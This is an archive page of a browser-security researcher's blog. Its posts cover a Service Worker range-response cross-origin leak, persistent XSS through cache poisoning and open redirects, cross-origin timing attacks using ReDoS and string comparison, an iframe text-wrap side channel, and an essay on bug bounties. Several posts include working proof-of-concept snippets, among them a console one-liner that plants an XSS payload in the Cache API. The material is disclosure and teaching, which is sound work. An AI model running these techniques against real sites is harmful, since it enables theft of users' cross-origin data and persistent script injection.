Sunday, October 04, 2015

Range Responses: Mix, Match & Leak


The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation about Range Requests / Responses (or.. more commonly known as Byte Serving) and Service Workers.

As things go, turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:

It's relatively straight forward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin since Service Workers apply to the page that created the request (so, say, if embeds a video from, the service worker from will be able to intercept the request to One thing to note about this, is that the Service Worker actually controls the total length of the response. What this means, is that even if the actual response is 2MB if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed is that you could split a response in two, one generated by a Service Worker and one that isn't. To clarify, the code below, intercepts a request to a song. What's interesting about it, is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect, is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      console.log('ignoring request');
So, to reiterate, the request is responding with "Ogg" as the first three bytes, and truncating the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what you can make a bad song last 1 second rather than 30 seconds?.

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
But the content in ORANGE comes from the Service Worker, and the content in RED comes from the target/victim site. A clever attacker would send 65 thousand different video frames until one of them doesn't error out, and then we would know what is the value of the bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard as it's really confusing to read these specs but essentially after like 1 hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response on 0-X and 0-X+1, that means there's an info leak! I did this and in a few hours and after wasting my time looking at MP3 files (it seems they just give out approximate duration at random) I found a candidate. Turns out it wasn't a checksum, it was something even better! :)

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is because in the position 306 of the robots.txt of there is a new line, while in the position 306 of there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size. Then that's about it! You just make the size longer and longer. So first problem solved. Now you can change the byte offset you are testing.

But still, the only thing I can know is whether the character at that position is a space or not. So, I started looking into why that errored out, and turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video because of some reason, and the byte in position 306 happened to be the video height dimensions that was longer than it was valid.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, for which it would overflow if the size is too big. The formula the video decoder was using for calculating the maximum dimensions is:

So! Seems easy enough then. I get the minimum value on which it errors out, and calculate it's complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison you can solve this minimum value with a simple binary search.

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal byte by byte of the robots.txt of

Severity-wise fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamic generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that it's possible this isn't specific with Service Workers as it seems that HTTP redirects have a similar effect (you make two requests to a same-origin video, the first time you respond with a truncated video, the second time you redirect to another domain).

Specially since Service Workers aren't as widely supported yet. Feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along this bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed for like 3 months because of Chrome, so didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results, and happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder. What I say here doesn't necessarily have to reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general. Mostly because in the last five years a lot has changed, there are many new players. Some giving rewards, and some receiving them.


As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was because I am a user and I (selfishly) tried to make the products I used, better and safer for me. Another reason was that the challenge of finding bugs in "big" companies was like solving an unsolvable puzzle. Like the last level of a wargame that the developers thought no one could solve.


With that said, I was super excited when companies started paying for bugs (mostly, because I had no money), but also because it felt "right". For a couple reasons but mostly because money is free for companies and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift, that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting. Specially when I learnt something new.


It is my view, that we shouldn't call them "Bug Bounty Programs", I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty", because bounty sounds a lot like it's money up for grabs, when the attitude is that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation, and it can go from the simple "thank you!" in an email, or  in public all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think that the main value reward programs provide isn't the "potential cyber-inteligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot more simple. To build and maintain a community around you, and you do that by building relationships.


Think about it this way. These bug hunters are also users of the products they found bugs on, and then these users go and make these products better for everyone else. And in return, the companies "thank" these users for their help for making it better not just for them, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users, they are a super-powered version of a user.

And reward programs were built for these users, for those that did it back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.


The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's more common to have money be used to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or talk bad about the affected company). It's quite interesting this isn't usually highlighted, but I think it's quite important. For many of us, recognition is more important than money, if any, because we depend so much on working and learning from others, that silence diminishes the value of our work.


One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider they are gifts, not price tags. If you could come up with a gift that feels adequate as a gift for a user that is going out of they way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult.. so if you have to use money, maybe what is worth to go out one night for dinner and movies, or so. You can take that and then go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" for $10 USD or so. Because while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low hanging fruit), but rewarding individual bugs at low rewards also gives the feeling you are just being used for crowd sourcing, or as a "Bulk Bounty".

In any case, I appreciate this is mostly the wrapping of the message being delivered, but I think the message matters when you are dealing with money. The difference between you being "the user" and you being "the product" changes the perception and relationship between companies and users.


Two of the most important aspects of any relationship, are trust and respect. Coming back to the point earlier about money, I really like to see how "no reward" responses are written in different companies, because they show how much of a feeling of a transaction, and how much of a feeling of appreciation there is.

Maybe somewhat counter-intuitive for some is that trust goes both ways. Trusting bug hunters makes response teams more trustworthy, and vice-versa. Accepting the possibility that you are wrong and made a mistake reporting a bug (even if the bug seems to be valid, maybe you are wrong!) and the other way around, handling a bug (even if the bug seems to be invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, specially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way to foster trust.


At the end of the day, a vulnerability report in a product is simply an attempt in helping the product. Such help sometimes is not welcome by some ("best bug is unknown bug") and some times it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially team work.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off the wrong way, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years. The most insistent researchers that send the most reports, are also the most enthusiastic and eager to learn.

Investing some time helping via coaching and education rather than just depending on automated advice or scoring and rankings helps to create and grow a community. These bug hunters want to help, why don't you help them? It needs time and patience, but it will be worth it. Some small amount of personal feedback is all that is needed. You can't automate relationships.


Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can have a sustainable life off white hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes a critical aspect for sustaining this relationship in the long term. Transparency and clarity on decisions and consistency suddenly become not just best practices but guiding principles.

Another interesting challenge is that of long term planning. It might make you more efficient at finding bugs to do so every day, but companies really want to eventually make finding these bugs harder and harder. This also creates some uncertainty about your future, and how to sustain this for a long time.

Then there are other challenges. These programs are quite unique and explaining them can be challenging for their legal and fiscal implications. I still remember when I got my first reward from Mozilla it was a bit awkward explaining to my bank why I had money being sent from abroad. I can just imagine having to do this every couple weeks, would be crazy.


It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you, it isn't an excuse to have them do work.
  • Appreciation, Recognition and Transparency (ART) are the pillars of a well ran security response program.
  • If you find yourself buried in low quality reports, invest some time to help them. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).

Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my  last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:

When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates it's cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above, if you click the button below here before poisoning the cache first, you will ruin the demo for ever since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++

Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post to repeat the presentation but in a written form, however I was hoping to watch the video to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. Anyway, so, until then, today this post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! It's APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps as no requests are actually done.) You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, that is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problems based on APIs like localStorage before, but what makes this difference is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cache response (it's logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached-up copy of the request. This cache is programmatic and totally up-to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available or, to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!

If you want to try this out, go here:

Then fake an XSS by typing this to the console:'prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see in new Service-Workers enabled applications often. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request, then simply not use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
And you have a service worker like this one:
What that service worker does, as the previous one, is simply cache all requests that go through by refetching and the service worker will cache the response from for the other request!

That means that next time the user goes to:
The request will be cached and instead of getting a 302 redirect, they will get the contents of

Note that for this to work, must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request be cors enabled (with a cross origin image, or embed request for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that because Service Workers will now be kind-of like Web Servers, but are being put there without having any APIs for secure web development, then it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs

For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). Things from RegExp bugs because the JS APIs aren't secure by default to things like the JSON API lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).

It's also worth noting that thanks to the asynchronous nature of Service Workers (event-driven and promise-based) mixed with developers that aren't used to this, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope, which while isn't the case today, is very likely to be the case soon.

Cross Site Request Forgery

Another concern is that CSRF protection will have to behave differently for Service Workers. In specific, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and off itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which remarks the problem, but also makes it hard for me to give you examples on why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.


I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is regarding web application timing attacks. The idea behind this attack is a couple of techniques on how to attack another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services, or local applications. Recently, they've become a bit popular, and are being used to attack browser security features.

Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.

The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..

Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.

We know that you can obviously know if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that cant interact with It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        e.source.postMessage('got a match!', e.source);

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9

You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        console.log('got a match');
    e.source.postMessage('finished', e.source);

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:

  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX

Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        console.log('got a match');

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates from I wasn't being totally honest. The JavaScript code from both, and run in the same thread. That is, if you have 3 iframes one pointing to, one pointing to and one pointing to then all of them run in the same thread.

Said in another way, if suddenly decides to run into an infinite loop, neither nor will be able to run in any JavaScript code. Don't believe me? Give it a try!


Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens upon us. Now, we don't need the other page surrender any information to us. Simply by running in the same thread we do, we can guess how long their code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, and then serializes it's text contents, and then searches for such value inside it. In a nutshell it does:


Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:

But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is can we detect string comparisons? Can we get enough accuracy out of that we get to know if string comparisons succeed?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
This strangely looking results mean, mostly, that comparing a very long string takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx"  is stable and is 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples we either average the results, or get the mean of means (which needs a lot of samples) or a chi squared test if we knew the variance or a student t test if you can assume a normal distribution (JavaScript's garbarge collector skews things a bit).

At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different than the numbers because here we have 37 characters alphabet, and with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for a 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to measure a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!

Sunday, September 22, 2013

[Matryoshka] - Wrapping Overflow Leak on Frames

I just came back from a very fun trip around Europe. Among other places, I visited Hamburg, to attend HackPra 2013, which was hosted in AppSec Europe. In there I gave the presentation Matryoshka - titled after the famous Russian dolls.

Today I'm blogging about one of the subjects of that presentation, an information leak introduced by a "side channel" present in iframes. I didn't give much detail in the presentation since I was afraid I was gonna run out of time (this was just one part of the presentation). This blogpost is meant to add more detail, as well as give a couple more details I wasn't sure worked at the time of the presentation.

A quick summary of the problem is that, under certain circumstances, it is possible to know when text inside an iframe wraps to the next line. Text wrapping is when a line is longer than the width of the area it can be displayed into, so it needs to wrap to a second line.

Being able to detect text wrapping is an interesting problem, as it allows us to learn some information about the framed website, which might be particularly dangerous under some circumstances.

To show a small example, the following iframe is hosted in a different domain than this blog post:

We are disallowed to know what the contents are because of the Same Origin Policy. It's important to understand this, we can iframe anything, including third party sites to which you are authenticated to. This might include sites that contain secret information, like your email inbox, or your bank statements.

Now, let's see what we can do:

  • We can, change the width and height of this iframe at our will.
  • We can navigate the inner iframes from that page.
  • We can change the style of your scrollbars or detect their presence.
To clarify, changing the width and height of the iframe will allow us to force some content to wrap on to the next line. To exploit this we need to know whether the content wrapped or not.

Navigating Child Iframes

By navigating child iframes, we can change an otherwise innocuous iframe (such as a Facebook like button), to a domain we control. We can do this by design, even on cross-domain iframes, look:

The reason for this is because the window.frames[] property is exposed cross-origin, and it's allowed by the Same Origin Policy to navigate child frames, even those that are cross domain.

The reason this matters, is because once we control a child iframe in our target page, we can know the position of the iframe relative to the browser/screen. This will let us know if the content of the page wrapped, as we'll discuss later on.

Detecting when the text wraps to the next line is the corner stone of this attack.

Detecting Iframe Screen Coordinates

In Trident and Gecko based browsers, it is possible to detect the position of an iframe relative to the screen. This is interesting, as it allows us to know exactly when an iframe moves down because of text wrapping.

We detect this with one of two properties, either window.screenTop for Trident based browsers, or window.mozInnerScreenY for Gecko based browsers (and mouse events in general). These properties are only readable from within the target iframe, but as we explained before, it is perfectly possible to navigate our target site child iframes, and once we do that, we can reduce the width of our iframe until text doesn't fit in the line anymore, and moves the rest of the line to the next line, displacing our iframe.

Please note this proof of concept doesn't work in all browsers (notably, it only works in firefox/ie), so it might not work for you, but feel free to give it a try.

Detecting Scrollbars Presence

